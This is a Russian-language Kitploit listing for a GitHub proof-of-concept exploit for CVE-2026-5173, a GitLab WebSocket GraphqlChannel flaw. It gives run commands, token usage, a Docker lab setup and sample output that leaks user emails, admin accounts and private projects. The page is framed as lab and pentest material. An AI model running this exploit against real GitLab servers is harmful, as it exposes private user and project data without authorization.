Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-5173 — CVE-2026-5173 | Kitploit
Инструменты/GitHubGitHub/0xblackash/cve-2026-5173
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHub0xblackash/cve-2026-5173

CVE-2026-5173

CVE-2026-5173

Репозиторий
115 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🦊 CVE-2026-5173: PoC неавторизованного выполнения методов через WebSocket GitLab

Linux Vulnerability (5) (1)

CVE Badge PoC Affected Versions Python

GitHub stars License


🛠️ Обзор

CVE-2026-5173 позволяет аутентифицированному злоумышленнику с низкими привилегиями вызывать ограниченные серверные методы через WebSocket GitLab (/-/cable), в частности через GraphqlChannel.

Это может привести к раскрытию конфиденциальных данных (высокая конфиденциальность) и ограниченным неавторизованным действиям.

Затронутые версии

  • GitLab CE/EE: 16.9.6 — 18.8.8
  • 18.9 до 18.9.5
  • 18.10 до 18.10.3

Исправлено в версиях: 18.8.9 • 18.9.5 • 18.10.3


⚡ Возможности

  • Чистый и современный PoC на Python 3
  • Простое использование одной командой: python3 CVE-2026-5173.py http://target:8080
  • Автоматическое подключение к WebSocket + подписка на GraphqlChannel
  • Перебор нескольких методов (currentUser, users, projects и др.)
  • Поддержка Personal Access Token
  • Красивый цветной вывод
  • Только для авторизованного использования в лабораторных условиях или пентестах

🚀 Быстрый старт

1. Клонируйте репозиторий

root@kitploit:~
git clone https://github.com/0xBlackash/CVE-2026-5173.git
cd CVE-2026-5173

2. Запустите PoC

root@kitploit:~
python3 CVE-2026-5173.py http://your-gitlab-lab:8080

С токеном (рекомендуется):

root@kitploit:~
python3 CVE-2026-5173.py http://target.com:8080 -t glpat-XXXXXXXXXXXXXXXXXXXX

📸 Скриншоты

Пример успешного вывода:

root@kitploit:~
[+] CVE-2026-5173 PoC v2 - Target: http://192.168.1.100:8080
[+] WebSocket connected
[+] Subscribed to GraphqlChannel
[*] Testing method: currentUser
[SUCCESS] Possible unauthorized access via 'currentUser'!
    → Response: {"result":{"data":{"currentUser":{"id":"gid://gitlab/User/123","name":"Normal User","email":"[email protected]"}}}...

[*] Testing method: users
[SUCCESS] Possible unauthorized access via 'users'!
    → Response: {"result":{"data":{"users":{"nodes":[ {"id":"gid://gitlab/User/1","name":"Admin","email":"[email protected]"}, ... ]}}}  ← This leaks all users including admins!

[*] Testing method: projects
[SUCCESS] Possible unauthorized access via 'projects'!
    → Response: long list of ALL projects (even private ones you shouldn't see)

📋 Использование

root@kitploit:~
python3 CVE-2026-5173.py <target> [options]

Arguments:
  target                Target URL (e.g. http://gitlab.example.com:8080)
  -t, --token           GitLab Personal Access Token (API scope)
  -h, --help            Show this help message

🧪 Настройка лабораторной среды (рекомендуется)

root@kitploit:~
docker run -d --name gitlab-vuln \
  -p 8080:80 -p 2222:22 \
  gitlab/gitlab-ce:18.10.2-ce.0

Затем создайте обычного пользователя и запустите PoC.


⚠️ Правовая информация и отказ от ответственности

  • Данный PoC предназначен только для образовательных целей и авторизованного тестирования.
  • Используйте только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение.
  • Несанкционированное использование незаконно и противоречит законодательству.
  • Я не несу ответственности за любое неправомерное использование.

📚 Ссылки

  • Официальный патч-релиз GitLab: https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/
  • Запись CVE: https://www.cve.org/CVERecord?id=CVE-2026-5173
  • Уведомление GitHub: https://github.com/advisories/GHSA-5gj7-3j23-w2h2

Сделано с ❤️ для сообщества специалистов по безопасности
Поставьте ⭐ репозиторию, если нашли его полезным!

Отказ от ответственности: на момент создания не было доступно ни одного публичного подробного эксплойта. Это PoC исследовательского уровня.

Скачать инструмент